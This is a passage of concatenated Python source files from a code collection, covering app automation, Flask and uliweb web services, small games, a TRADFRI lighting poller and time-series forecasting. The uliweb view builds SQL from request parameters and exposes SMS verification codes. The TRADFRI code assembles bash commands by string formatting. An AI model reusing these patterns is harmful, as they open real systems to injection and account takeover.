webdriver.Remote(server,param)\n\ntime.sleep(5)\ndriver.find_element_by_id(\"com.ss.android.ugc.aweme:id/bdb\").click()\n\ntime.sleep(1)\ndriver.find_element_by_id(\"com.android.packageinstaller:id/permission_allow_button\").click()\ntime.sleep(1)\ndriver.find_element_by_id(\"com.android.packageinstaller:id/permission_allow_button\").click()\ntime.sleep(1)\nfor i in range(10):\n# while True:\n\n driver.swipe(500, 1200, 500, 400, 300)\n time.sleep(3)\n\n # currenttime = datetime.datetime.now()\n\n # if str(currenttime)[:-7] == '2021-07-05 16:50:00':\n # break\n\n\ndriver.quit()","sub_path":"摸鱼.py","file_name":"摸鱼.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"1109610","text":"# This microservice handles all the track description update specific information\n# * New API calls:\n# - POST /api/users/settrackdesc change description of a track, input data { \"trackurl\": \"track123\",\"username\": \"bony2018\", \"description\": \"My favourite track1!\"}\n# Note if trackurl and username combo not exists it will insert, otherwise it will update the description\n# - GET /api/users/gettrackdesc/<string:username>/<string:trackurl> to retrieve a track description of specific user , input username and trackurl in the API url\n\n\nimport sys\nimport flask_api\nfrom flask import request\nfrom flask_api import status, exceptions\nimport pugsql\nimport base64, hashlib, bcrypt, os, sys\n\n\napp = flask_api.FlaskAPI(__name__)\napp.config.from_envvar('APP_CONFIG')\n\nqueries = pugsql.module('queries/')\nqueries.connect(app.config['DATABASE_URL'])\n\n\n@app.cli.command('init')\n#Initialize the database\ndef init_db():\n with app.app_context():\n db = queries._engine.raw_connection()\n with app.open_resource('tracks.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n@app.teardown_appcontext\ndef close_connection(exception):\n db = queries._engine.raw_connection()\n db.close()\n\n#Base url\n@app.route('/', methods=['GET'])\ndef home():\n return '''<h1>Tracks description microservice running</h1>\n<p>A prototype API for musiclist of users.</p>'''\n\n\n#Set a tracks description if not present. 
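The Appium script paces itself with fixed time.sleep calls before tapping the two permission dialogs. Since the Appium Python client builds on selenium, an explicit wait is the more robust pattern (a sketch reusing the driver session and element id from above):

    from selenium.webdriver.support.ui import WebDriverWait

    ALLOW = "com.android.packageinstaller:id/permission_allow_button"

    # Poll up to 10 s for the button instead of sleeping a fixed second.
    WebDriverWait(driver, 10).until(
        lambda d: d.find_element_by_id(ALLOW)
    ).click()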
Also, if description already present update it\n@app.route('/api/users/settrackdesc', methods=['GET','POST'])\ndef track_ops():\n if request.method == 'POST':\n return create_desc(request.data)\n return {\"status\":status.HTTP_200_OK},status.HTTP_200_OK\n\n#Update or create description of track\ndef create_desc(track):\n track = request.data\n required_fields = ['trackurl','description','username']\n if not all([field in track for field in required_fields]):\n raise exceptions.ParseError()\n try:\n username = request.data.get('username')\n trackurl = request.data.get('trackurl')\n description=request.data.get('description')\n if (trackurl==\"\"):\n return { 'error': \"Invalid trackurl!\" },status.HTTP_400_BAD_REQUEST\n\n valid=queries.user_by_id(id=username)\n trackid=queries.fetch_track_id(trackurl=trackurl,username=username)\n print(trackid,trackurl,username,description)\n if (valid):\n if (trackid):\n queries.update_track(username=username,trackurl=trackurl,description=description)\n return {\"Success\":status.HTTP_202_ACCEPTED},status.HTTP_202_ACCEPTED\n else:\n queries.insert_track(trackurl=trackurl,username=username,description=description)\n\n else:\n return {track['username']:\" Does not exists\"},status.HTTP_409_CONFLICT\n except Exception as e:\n return { 'error': str(e) }, status.HTTP_409_CONFLICT\n return {track['trackurl']:status.HTTP_201_CREATED},status.HTTP_201_CREATED\n\n#Get a track specific URL.\n@app.route('/api/users/gettrackdesc/<string:username>/<string:trackurl>', methods=['GET'])\ndef track_ret(username,trackurl):\n track_desc=queries.fetch_track(trackurl=trackurl,username=username)\n if(track_desc!=None):\n return {trackurl:track_desc},status.HTTP_200_OK\n else:\n return {trackurl:\"Do not exists\"},status.HTTP_400_BAD_REQUEST\n","sub_path":"Microservices/desc.py","file_name":"desc.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"429682450","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gdk\n\nfrom board import Board\nfrom sidebar import Sidebar\n\nclass GameWindow(Gtk.Window):\n\n def __init__(self, maze, players):\n Gtk.Window.__init__(self, title = \"Maze\")\n self.set_border_width(20)\n \n self.players = players\n\n self.box = Gtk.Box(orientation = Gtk.Orientation.VERTICAL, spacing = 20)\n self.add(self.box)\n \n self.sidebar = Sidebar(self.players)\n self.box.pack_start(self.sidebar, True, True, 0)\n\n self.board = Board(maze, self.players, self)\n self.box.pack_start(self.board, True, True, 0)\n\n self.connect(\"key-press-event\", self.press)\n\n def press(self, widget, event):\n keyval = event.keyval\n keyval_name = Gdk.keyval_name(keyval)\n state = event.state\n\n if keyval_name == \"w\":\n self.board.move(\"Up\", self.players[0])\n if keyval_name == \"a\":\n self.board.move(\"Left\", self.players[0])\n if keyval_name == \"s\":\n self.board.move(\"Down\", self.players[0])\n if keyval_name == \"d\":\n self.board.move(\"Right\", self.players[0])\n\n if keyval_name in [\"Up\", \"Down\", \"Left\", \"Right\"]:\n self.board.move(keyval_name, self.players[1])\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"150027262","text":"from lbann.contrib.nersc.systems import *\nimport lbann.launcher\nfrom lbann.util import make_iterable\nfrom math import ceil\n\ndef make_batch_script(\n 
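create_desc above does the upsert by hand: fetch_track_id, then either update_track or insert_track. On SQLite (which the tracks.sql bootstrap suggests) the two round trips collapse into one statement; a sketch with the stdlib driver and a hypothetical table shaped like the queries:

    import sqlite3

    con = sqlite3.connect(":memory:")
    con.execute("""CREATE TABLE tracks (
        username TEXT, trackurl TEXT, description TEXT,
        PRIMARY KEY (username, trackurl))""")

    def set_track_desc(username, trackurl, description):
        # Single-statement upsert (SQLite >= 3.24).
        con.execute(
            """INSERT INTO tracks (username, trackurl, description)
               VALUES (?, ?, ?)
               ON CONFLICT (username, trackurl)
               DO UPDATE SET description = excluded.description""",
            (username, trackurl, description))

    set_track_desc("bony2018", "track123", "My favourite track1!")
    set_track_desc("bony2018", "track123", "updated")
    print(con.execute("SELECT description FROM tracks").fetchone())  # ('updated',)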
system=system(),\n procs_per_node=procs_per_node(),\n scheduler=scheduler(),\n launcher_args=[],\n environment={},\n *args,\n **kwargs,\n):\n \"\"\"Construct batch script manager with NERSC-specific optimizations.\n\n This is a wrapper around `lbann.launcher.make_batch_script`, with\n defaults and optimizations for NERSC systems. See that function for a\n full list of options.\n\n \"\"\"\n\n # Create shallow copies of input arguments\n launcher_args = list(make_iterable(launcher_args))\n environment = environment.copy()\n\n if system == CORI_GPU:\n cores_per_proc = cores_per_node(system) // procs_per_node\n if 'AL_PROGRESS_RANKS_PER_NUMA_NODE' not in environment:\n environment['AL_PROGRESS_RANKS_PER_NUMA_NODE'] = ceil(procs_per_node / numa_nodes_per_node(system))\n if 'OMP_NUM_THREADS' not in environment:\n environment['OMP_NUM_THREADS'] = cores_per_proc - 1\n if scheduler == 'slurm':\n masks = [2**cores_per_proc - 1]\n while len(masks) < procs_per_node:\n masks.append(masks[-1] << cores_per_proc)\n mask_str = ','.join([hex(mask) for mask in masks])\n launcher_args.append('--cpu_bind=mask_cpu:{}'.format(mask_str))\n\n launcher_args.extend(['--qos=regular',\n f'--cpus-per-task={cores_per_proc}',\n '--gpus-per-task=1',\n '--constraint=gpu'])\n\n # Hack to enable process forking\n # Note: InfiniBand is known to experience hangs if an MPI\n # process is forked (see\n # https://www.open-mpi.org/faq/?category=openfabrics#ofa-fork).\n # Setting IBV_FORK_SAFE seems to fix this issue, but it may\n # hurt performance (see\n # https://linux.die.net/man/3/ibv_fork_init).\n if 'IBV_FORK_SAFE' not in environment:\n environment['IBV_FORK_SAFE'] = 1\n\n if 'MV2_ENABLE_AFFINITY' not in environment:\n environment['MV2_ENABLE_AFFINITY'] = 0\n\n if 'MV2_USE_CUDA' not in environment:\n environment['MV2_USE_CUDA'] = 1\n\n if 'MKL_THREADING_LAYER' not in environment:\n environment['MKL_THREADING_LAYER'] = 'GNU'\n\n return lbann.launcher.make_batch_script(\n procs_per_node=procs_per_node,\n scheduler=scheduler,\n launcher_args=launcher_args,\n environment=environment,\n *args,\n **kwargs,\n )\n","sub_path":"python/lbann/contrib/nersc/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"169947447","text":"#coding=utf-8\n\nfrom uliweb import expose, functions, settings\nfrom forms import getcodeForm\n\n@expose('/')\ndef index():\n return {}\n\n@expose('/echart')\ndef echart():\n ews_tasks=functions.get_model('ews_task').all().count()\n ews_interfaces=functions.get_model('ews_interface').all().count()\n interface_cases=functions.get_model('interface_case').all().count()\n wikipages=functions.get_model('wikipage').all().count()\n task_log=functions.get_model('task_log')\n tl=task_log.all().order_by(task_log.c.id.desc())\n\n list=[]\n legend=[]\n category=[]#任务列表\n data=[]#任务最近1次通过列表\n series=[]\n \n s={\n 'name':'',\n 'type':'line',\n 'data':data,\n 'markPoint' : {\n 'data' : [\n #{'type' : 'max', 'name': '最大值'},\n {'type' : 'min', 'name': '最小值'}\n ]\n },\n 'markLine' : {\n 'data' : [\n #{'type' : 'average', 'name': '平均值'}\n ]\n }\n \n }\n \n rate= {\n 'legend':legend,\n 'category' : category,\n 'series' :series\n }\n \n sum= {\n 'legend':['总量'],\n 'category' : ['0','任务数','接口数','用例数','wiki数'],\n 'series' :[\n {\n 'name':'总量',\n 'type':'bar',\n 'barWidth': '20',\n 'data':[0,ews_tasks, ews_interfaces, interface_cases, wikipages-1]\n \n }\n ]\n }\n \n for t in tl:\n if t.task not in 
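The Cori-GPU branch pins each rank to a disjoint block of cores by building hex bitmasks: the first mask covers cores 0..cores_per_proc-1 and each subsequent mask is the previous one shifted left by cores_per_proc. Worked through for a hypothetical 4 ranks x 16 cores:

    cores_per_proc, procs_per_node = 16, 4
    masks = [2**cores_per_proc - 1]          # rank 0: cores 0-15 -> 0xffff
    while len(masks) < procs_per_node:
        masks.append(masks[-1] << cores_per_proc)
    print(','.join(hex(m) for m in masks))
    # 0xffff,0xffff0000,0xffff00000000,0xffff000000000000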
category and t.flag==u'成功':\n category.append(t.task)\n data.append(t.rate)\n series.append(s)\n \n \n \n list.append(rate)\n list.append(sum)\n return json(list)\n\n\n@expose('/getcode')\ndef getcode():\n form=getcodeForm()\n mobile=request.params.get('mobile')\n username=request.params.get('username')\n if mobile ==None and username ==None:\n return {'code':0,'form':form}\n \n from project_autotest import redis_con,oracle_db\n import datetime\n \n redis_con=redis_con.redis_s()\n list_tag=redis_con.list_tag\n\n for tag in list_tag:\n code=redis_con.get_code(tag,username,mobile)\n if code:\n break\n \n if not code:\n code=redis_con.get_reg_code(mobile)\n\n if not code:\n if mobile:\n field=mobile\n else:\n field=username\n try:\n cmd=\"select f_content,f_date from t_userservicesendlog where (f_username='%s' or f_to='%s') order by f_date desc\"%(field,field)\n con=oracle_db.Oracle('sns','LOCTEST')\n s=con.execsql(cmd)\n now=datetime.datetime.today()\n delta=now-s[1]\n if delta < datetime.timedelta(minutes=15):\n code=s[0]\n except:\n pass\n \n return {'code':code,'form':form}\n\n\n","sub_path":"apps/portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"18125502","text":"import pygame.font\nfrom pygame.sprite import Group\nfrom remain_ship import RemainShip\n\nclass Scoreboard():\n def __init__(self,ai_settings, screen, stats):\n self.screen = screen\n self.screen_rect = screen.get_rect()\n self.ai_settings = ai_settings\n self.stats = stats\n \n self.text_color = (255, 215, 0)\n self.font = pygame.font.SysFont(None, 30)\n \n self.prep_score()\n self.prep_high_score()\n self.prep_level()\n self.prep_remain_ships()\n \n def prep_score(self):\n rounded_score = round(self.stats.score, -1)\n score_str = 'Sco: ' + \"{:,}\".format(rounded_score)\n self.score_image = self.font.render(score_str, True, self.text_color, self.ai_settings.bg_color)\n \n self.score_rect = self.score_image.get_rect()\n self.score_rect.right = self.screen_rect.right - 20\n self.score_rect.top = 20\n \n def prep_high_score(self):\n high_score = int(round(self.stats.high_score, -1))\n high_score_str ='Max: ' + \"{:,}\".format(high_score)\n self.high_score_image = self.font.render(high_score_str, True, self.text_color, self.ai_settings.bg_color)\n \n self.high_score_rect = self.high_score_image.get_rect()\n self.high_score_rect.right = self.screen_rect.right - 400\n self.high_score_rect.top = 20\n \n def prep_level(self):\n self.level_str = 'Level: ' + str(self.stats.level)\n self.level_image = self.font.render(self.level_str, True, self.text_color, self.ai_settings.bg_color)\n \n self.level_image_rect = self.level_image.get_rect()\n self.level_image_rect.centerx = self.screen_rect.centerx - 200\n self.level_image_rect.top = 20\n \n def prep_remain_ships(self):\n self.remain_ships = Group()\n for ship_number in range(self.stats.ships_left):\n remain_ship = RemainShip(self.screen)\n remain_ship.rect.x = 10 + ship_number * remain_ship.rect.width\n remain_ship.rect.y = 10\n self.remain_ships.add(remain_ship)\n \n def show_score(self):\n self.screen.blit(self.score_image, self.score_rect)\n self.screen.blit(self.high_score_image, self.high_score_rect)\n self.screen.blit(self.level_image, self.level_image_rect)\n 
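The echart view appends the same s dict to series on every loop pass, and every appended entry shares the single data list, so all tasks end up aliasing one series object. Building a fresh dict per task avoids this (sketch with made-up task rows):

    series = []
    for name, rate in [("smoke", 98), ("regress", 91)]:
        series.append({
            "name": name,
            "type": "line",
            "data": [rate],      # fresh list per series, no shared state
        })
    print(series)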
self.remain_ships.draw(self.screen)","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"343334721","text":"TIMER_ID = \"wirehome.tradfri.gateway_manager.poll_thread\"\n\nconfig = {}\n\nfrom time import sleep\nimport sys\n\n\ndef initialize():\n # wirehome.debugger.enable()\n\n global _devices, _gateway_is_connected\n _devices = {}\n _gateway_is_connected = False\n\n\ndef start():\n wirehome.scheduler.start_timer(TIMER_ID, 2000, __poll_status__)\n\n\ndef stop():\n wirehome.scheduler.stop_timer(TIMER_ID)\n\n\ndef get_debug_infomation(_):\n return {\n \"devices\": _devices,\n \"trace\": wirehome.debugger.get_trace(),\n \"gateway_is_connected\": _gateway_is_connected\n }\n\n\ndef __find_device_id__(caption):\n for device_uid in _devices:\n if _devices[device_uid][\"9001\"] == caption:\n return int(device_uid)\n\n return None\n\n\ndef set_device_status(status):\n device_id = status.get(\"device_id\", None)\n if device_id == None:\n device_caption = status.get(\"device_id\", None)\n device_id = __find_device_id__(device_caption)\n\n if device_id == None:\n return {\"type\": \"exception.parameter_invalid\", \"parameter_name\": \"device_id\"}\n\n power_state = status.get(\"power_state\", 0)\n brightness = status.get(\"brightness\", 245)\n color = status.get(\"color\", \"ffffff\")\n\n uri = \"15001/\" + str(device_id)\n data = {\"5850\": power_state}\n\n # Do not add other values if power is off. Otherwise the device will go on and off\n # e.g when chaning the brightness while the device is off.\n if power_state == 1:\n data[\"5851\"] = brightness\n data[\"5706\"] = color\n\n data = {\"3311\": [data]}\n\n payload = wirehome.json_serializer.serialize(data)\n\n return __execute_coap_request__(\"put\", uri, payload)\n\n\ndef __poll_status__(_):\n global _gateway_is_connected, _devices\n\n response = None\n try:\n new_devices = {}\n\n response = __execute_coap_request__(\"get\", \"15001\")\n device_ids = response[\"output_data\"]\n device_ids = wirehome.json_serializer.deserialize(device_ids)\n\n for device_id in device_ids:\n response = __execute_coap_request__(\"get\", \"15001/\" + str(device_id))\n new_devices[device_id] = wirehome.json_serializer.deserialize(response[\"output_data\"])\n\n _gateway_is_connected = True\n __fire_events__(_devices, new_devices)\n _devices = new_devices\n except:\n _gateway_is_connected = False\n print(\"TRADFRI gateway pull failed. 
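prep_score and prep_high_score above format scores by rounding to the nearest ten and inserting thousands separators; for example:

    score = 123456
    print("Sco: " + "{:,}".format(round(score, -1)))   # Sco: 123,460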
(Response=\" + str(response) + \")\")\n sleep(10)\n raise\n\n\ndef __fire_events__(old, new):\n if old == None or new == None:\n return\n\n for device_id in new:\n old_power_state = __get_device_status_value__(old, device_id, \"5850\")\n new_power_state = __get_device_status_value__(new, device_id, \"5850\")\n if old_power_state != new_power_state:\n wirehome.message_bus.publish({\n \"type\": \"tradfri.gateway_manager.event.device_state_changed\",\n \"device_id\": device_id,\n \"property\": \"power_state\",\n \"old_state\": \"on\" if old_power_state == 1 else \"off\",\n \"new_state\": \"on\" if new_power_state == 1 else \"off\"\n })\n\n old_brightness = __get_device_status_value__(old, device_id, \"5851\")\n new_brightness = __get_device_status_value__(new, device_id, \"5851\")\n if old_brightness != new_brightness:\n wirehome.message_bus.publish({\n \"type\": \"tradfri.gateway_manager.event.device_state_changed\",\n \"device_id\": device_id,\n \"property\": \"brightness\",\n \"old_state\": old_brightness,\n \"new_state\": new_brightness\n })\n\n old_color = __get_device_status_value__(old, device_id, \"5706\")\n new_color = __get_device_status_value__(new, device_id, \"5706\")\n if old_color != new_color:\n wirehome.message_bus.publish({\n \"type\": \"tradfri.gateway_manager.event.device_state_changed\",\n \"device_id\": device_id,\n \"property\": \"color\",\n \"old_state\": old_color,\n \"new_state\": new_color\n })\n\n\ndef __get_device_status_value__(source, device_id, status_id):\n device = source.get(device_id, None)\n if device == None:\n return None\n\n status = device.get(\"3311\", None)\n if status == None:\n return None\n\n if not isinstance(status, list):\n return None\n\n if len(status) != 1:\n return None\n\n status = status[0]\n\n return status.get(status_id, None)\n\n\ndef __execute_coap_request__(method, uri, payload=\"\"):\n address = config.get(\"gateway_address\", None)\n identity = config.get(\"identity\", \"wirehome\")\n psk = config.get(\"psk\", None)\n\n uri = \"coaps://{a}:5684/{u}\".format(a=address, u=uri)\n\n escapedPayload = payload.replace('\"', '\"\"')\n arguments = '-c \"coap-client -m {} -u \"{}\" -k \"{}\" -e \\'{}\\' \"{}\"\"'.format(\n method,\n identity,\n psk,\n escapedPayload,\n uri)\n\n wirehome.debugger.trace(arguments)\n\n parameters = {\n \"file_name\": \"/bin/bash\",\n \"arguments\": arguments,\n \"timeout\": 1000\n }\n\n execute_result = wirehome.os.execute(parameters)\n execute_result[\"arguments\"] = arguments\n\n return execute_result\n","sub_path":"wirehome.services.tradfri.gateway_manager/1.0.0/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":5255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"215777427","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nclass ArimaForecasting():\n def arimaForecasting(self):\n dataset = pd.read_csv(\"/home/fidel/Downloads/AirPassengers.csv\", infer_datetime_format=True, header=0, delimiter=\",\")\n # print (dataset.columns['Profit'])\n # print dataset.dtypes\n\n # print datasetExtracted.dtypes\n # print datasetExtracted\n indexColm=\"Month\"\n targetColm=\"#Passengers\"\n dataset = dataset.filter([indexColm,targetColm])\n indexedDataset = dataset.set_index([indexColm])\n print (indexedDataset)\n\n # plt.xlabel(\"Date\")\n # plt.ylabel(\"Freight\")\n # plt.plot(indexedDataset)\n # plt.show()\n\n import datetime\n\n # calculating the rolling mean and std\n rolmean = 
indexedDataset.rolling(window=12).mean()\n rolstddev = indexedDataset.rolling(window=12).std()\n\n print (rolmean, rolstddev)\n # originalDataset = plt.plot(indexedDataset, color=\"blue\", label = \"Original\")\n # meanData = plt.plot(rolmean, color=\"red\", label = \"mean\")\n # stdDevData = plt.plot(rolstddev, color=\"green\", label=\"stddev\")\n # plt.show()\n\n # dickey fuller test\n from statsmodels.tsa.stattools import adfuller\n datasetTest = adfuller(indexedDataset[targetColm], autolag=\"AIC\")\n datasetOutput = pd.Series(datasetTest[0:4], index=[\"Test Statistic\", \"p-value\", \"#Lags Used\", \"Number of Observations Used\"])\n for key,value in datasetTest[4].items():\n datasetOutput[key] = value\n print (datasetOutput)\n\n # Estimating trend\n indexedDataset_logScale = np.log(indexedDataset)\n # plt.plot(indexedDataset_logScale)\n # plt.show()\n\n movingAverage = indexedDataset_logScale.rolling(window=12).mean()\n movingSTD = indexedDataset_logScale.rolling(window=12).std()\n # plt.plot(indexedDataset_logScale)\n # plt.plot(movingAverage, color='red')\n # plt.show()\n\n\n # Get the difference between the moving average and the actual number of passengers\n datasetLogScaleMinusMovingAverage = indexedDataset_logScale - movingAverage\n datasetLogScaleMinusMovingAverage.head(12)\n # Remove Nan Values\n datasetLogScaleMinusMovingAverage.dropna(inplace=True)\n datasetLogScaleMinusMovingAverage.head(10)\n\n from statsmodels.tsa.stattools import adfuller\n def test_stationarity(timeseries):\n\n # Determing rolling statistics\n movingAverage = timeseries.rolling(window=12).mean()\n movingSTD = timeseries.rolling(window=12).std()\n\n # Plot rolling statistics:\n # orig = plt.plot(timeseries, color='blue', label='Original')\n # mean = plt.plot(movingAverage, color='red', label='Rolling Mean')\n # std = plt.plot(movingSTD, color='black', label='Rolling Std')\n # plt.legend(loc='best')\n # plt.title('Rolling Mean & Standard Deviation')\n # plt.show(block=False)\n\n # Perform Dickey-Fuller test:\n print('Results of Dickey-Fuller Test:')\n dftest = adfuller(timeseries[targetColm], autolag='AIC')\n dfoutput = pd.Series(dftest[0:4],\n index=['Test Statistic', 'p-value', '#Lags Used', 'Number of Observations Used'])\n for key, value in dftest[4].items():\n dfoutput['Critical Value (%s)' % key] = value\n print(dfoutput)\n\n test_stationarity(datasetLogScaleMinusMovingAverage)\n #\n # exponentialDecayWeightedAverage = indexedDataset_logScale.ewm(halflife=12, min_periods=0, adjust=True).mean()\n # plt.plot(indexedDataset_logScale)\n # plt.plot(exponentialDecayWeightedAverage, color='red')\n #\n # datasetLogScaleMinusMovingExponentialDecayAverage = indexedDataset_logScale - exponentialDecayWeightedAverage\n # test_stationarity(datasetLogScaleMinusMovingExponentialDecayAverage)\n #\n datasetLogDiffShifting = indexedDataset_logScale - indexedDataset_logScale.shift()\n # plt.plot(datasetLogDiffShifting)\n #\n # datasetLogDiffShifting.dropna(inplace=True)\n # test_stationarity(datasetLogDiffShifting)\n #\n # from statsmodels.tsa.seasonal import seasonal_decompose\n # decomposition = seasonal_decompose(indexedDataset_logScale)\n #\n # trend = decomposition.trend\n # seasonal = decomposition.seasonal\n # residual = decomposition.resid\n #\n # plt.subplot(411)\n # plt.plot(indexedDataset_logScale, label='Original')\n # plt.legend(loc='best')\n # plt.subplot(412)\n # plt.plot(trend, label='Trend')\n # plt.legend(loc='best')\n # plt.subplot(413)\n # plt.plot(seasonal, label='Seasonality')\n # 
plt.legend(loc='best')\n # plt.subplot(414)\n # plt.plot(residual, label='Residuals')\n # plt.legend(loc='best')\n # plt.tight_layout()\n #\n # decomposedLogData = residual\n # decomposedLogData.dropna(inplace=True)\n # test_stationarity(decomposedLogData)\n #\n # # ACF and PACF plots:\n # from statsmodels.tsa.stattools import acf, pacf\n #\n # lag_acf = acf(datasetLogDiffShifting, nlags=20)\n # lag_pacf = pacf(datasetLogDiffShifting, nlags=20, method='ols')\n #\n # # Plot ACF:\n # plt.subplot(121)\n # plt.plot(lag_acf)\n # plt.axhline(y=0, linestyle='--', color='gray')\n # plt.axhline(y=-1.96 / np.sqrt(len(datasetLogDiffShifting)), linestyle='--', color='gray')\n # plt.axhline(y=1.96 / np.sqrt(len(datasetLogDiffShifting)), linestyle='--', color='gray')\n # plt.title('Autocorrelation Function')\n #\n # # Plot PACF:\n # plt.subplot(122)\n # plt.plot(lag_pacf)\n # plt.axhline(y=0, linestyle='--', color='gray')\n # plt.axhline(y=-1.96 / np.sqrt(len(datasetLogDiffShifting)), linestyle='--', color='gray')\n # plt.axhline(y=1.96 / np.sqrt(len(datasetLogDiffShifting)), linestyle='--', color='gray')\n # plt.title('Partial Autocorrelation Function')\n # plt.tight_layout()\n #\n # from statsmodels.tsa.arima_model import ARIMA\n #\n # # AR MODEL\n # model = ARIMA(indexedDataset_logScale, order=(2, 1, 0))\n # results_AR = model.fit(disp=-1)\n # plt.plot(datasetLogDiffShifting)\n # plt.plot(results_AR.fittedvalues, color='red')\n # plt.title('RSS: %.4f' % sum((results_AR.fittedvalues - datasetLogDiffShifting[\"#Passengers\"]) ** 2))\n # print('Plotting AR model')\n #\n # # MA MODEL\n # model = ARIMA(indexedDataset_logScale, order=(0, 1, 2))\n # results_MA = model.fit(disp=-1)\n # plt.plot(datasetLogDiffShifting)\n # plt.plot(results_MA.fittedvalues, color='red')\n # plt.title('RSS: %.4f' % sum((results_MA.fittedvalues - datasetLogDiffShifting[\"#Passengers\"]) ** 2))\n # print('Plotting AR model')\n #\n from statsmodels.tsa.arima_model import ARIMA\n model = ARIMA(indexedDataset_logScale, order=(2, 1, 2))\n results_ARIMA = model.fit(disp=-1)\n # plt.plot(datasetLogDiffShifting)\n # plt.plot(results_ARIMA.fittedvalues, color='red')\n # plt.title('RSS: %.4f' % sum((results_ARIMA.fittedvalues - datasetLogDiffShifting[targetColm]) ** 2))\n # plt.show()\n\n predictions_ARIMA_diff = pd.Series(results_ARIMA.fittedvalues, copy=True)\n print (predictions_ARIMA_diff.head())\n\n # Convert to cumulative sum\n predictions_ARIMA_diff_cumsum = predictions_ARIMA_diff.cumsum()\n print (predictions_ARIMA_diff_cumsum.head())\n\n predictions_ARIMA_log = pd.Series(indexedDataset_logScale[targetColm].ix[0],\n index=indexedDataset_logScale[targetColm].index)\n predictions_ARIMA_log = predictions_ARIMA_log.add(predictions_ARIMA_diff_cumsum, fill_value=0)\n predictions_ARIMA_log.head()\n\n predictions_ARIMA = np.exp(predictions_ARIMA_log)\n plt.plot(indexedDataset)\n plt.plot(predictions_ARIMA)\n plt.title('RMSE: %.4f' % np.sqrt(\n sum((predictions_ARIMA - indexedDataset[\"#Passengers\"]) ** 2) / len(indexedDataset[\"#Passengers\"])))\n plt.show()\n\n\n\nif __name__==\"__main__\":\n ArimaForecasting().arimaForecasting()\n\n\n","sub_path":"ArimaTest.py","file_name":"ArimaTest.py","file_ext":"py","file_size_in_byte":8492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"27215384","text":"import os\nimport pygame\nfrom pygame.locals import *\nimport sys\n\npygame.init()\nscreen = pygame.display.set_mode((500, 500), HWSURFACE | DOUBLEBUF | RESIZABLE)\npic = 
pygame.image.load(\"1.png\")\nscreen.blit(pygame.transform.scale(pic, (500, 500)), (0, 0))\npygame.display.flip()\npygame.mixer.music.load(\"bgm.ogg\")\npygame.mixer.music.play()\nwhile True:\n pygame.event.pump()\n event = pygame.event.wait()\n if event.type == QUIT:\n pygame.display.quit()\n sys.exit()\n elif event.type == VIDEORESIZE:\n screen = pygame.display.set_mode(\n event.dict['size'], HWSURFACE | DOUBLEBUF | RESIZABLE)\n screen.blit(pygame.transform.scale(pic, event.dict['size']), (0, 0))\n pygame.display.flip()\n","sub_path":"reminder.py","file_name":"reminder.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"14944190","text":"from tkinter import *\n\nfrom XuLyFile import DocFile, LuuFile\n\n\ndef themAction():\n line = stringMa.get() + \";\" + stringTen.get() + \";\" + stringNam.get()\n LuuFile(line)\n stringTen.set(\"\")\n stringNam.set(\"\")\n stringMa.set(\"\")\n showList()\n\n\ndef showList():\n arrSach = DocFile()\n listbox.delete(0, END)\n for item in arrSach:\n listbox.insert(END, item)\n\n\nroot = Tk()\nstringMa = StringVar()\nstringTen = StringVar()\nstringNam = StringVar()\nLabel(root, text=\"Quản Lý Sách\", fg='blue', font=(\"cambria\", 16)).grid(row=0, columnspan=2)\nroot.title(\"Quản lý sách\")\nroot.minsize(height=300, width=310)\nroot.resizable(height=True, width=True)\n\nlistbox = Listbox(root, width=50)\nlistbox.grid(row=1, columnspan=2)\nshowList()\nLabel(root, text=\"Mã sách:\").grid(row=2, column=0)\nEntry(root, width=35, textvariable=stringMa).grid(row=2, column=1)\nLabel(root, text=\"Tên sách:\").grid(row=3, column=0)\nEntry(root, width=35, textvariable=stringTen).grid(row=3, column=1)\nLabel(root, text=\"Năm xuất bản:\").grid(row=4, column=0)\nEntry(root, width=35, textvariable=stringNam).grid(row=4, column=1)\nframeButton = Frame(root)\nButton(frameButton, text=\"Thêm\", command=themAction).pack(side=LEFT)\nButton(frameButton, text=\"Tìm\").pack(side=LEFT)\nButton(frameButton, text=\"Sắp xếp\").pack(side=LEFT)\nButton(frameButton, text=\"Thoát\", command=root.quit).pack(side=LEFT)\nframeButton.grid(row=5, column=1)\nroot.mainloop()\n","sub_path":"GUI_QuanLySach/MyGui.py","file_name":"MyGui.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"493771165","text":"from threading import Thread\nfrom time import sleep\n\n\nclass AsyncCountdownTimer(Thread):\n \"\"\"\n 异步倒计时定时器。使用给定的倒计时量和反馈事件初始化,调用start方法开始计时。\n 若时间到,则调用给定的反馈事件。在定时器触发前,可以调用reset方法停止计时并复位。\n 时间到且反馈事件被触发前,定时器将自动复位。\n \"\"\"\n\n def __init__(self, seconds, callback, **kwargs):\n super().__init__()\n self.__seconds = seconds\n self.__callback = callback\n self.__kwargs = kwargs\n self.__run = True\n\n def start(self) -> None:\n \"\"\"\n 启动定时器。\n \"\"\"\n super().start()\n\n def run(self) -> None:\n __in = 0.25\n counter = 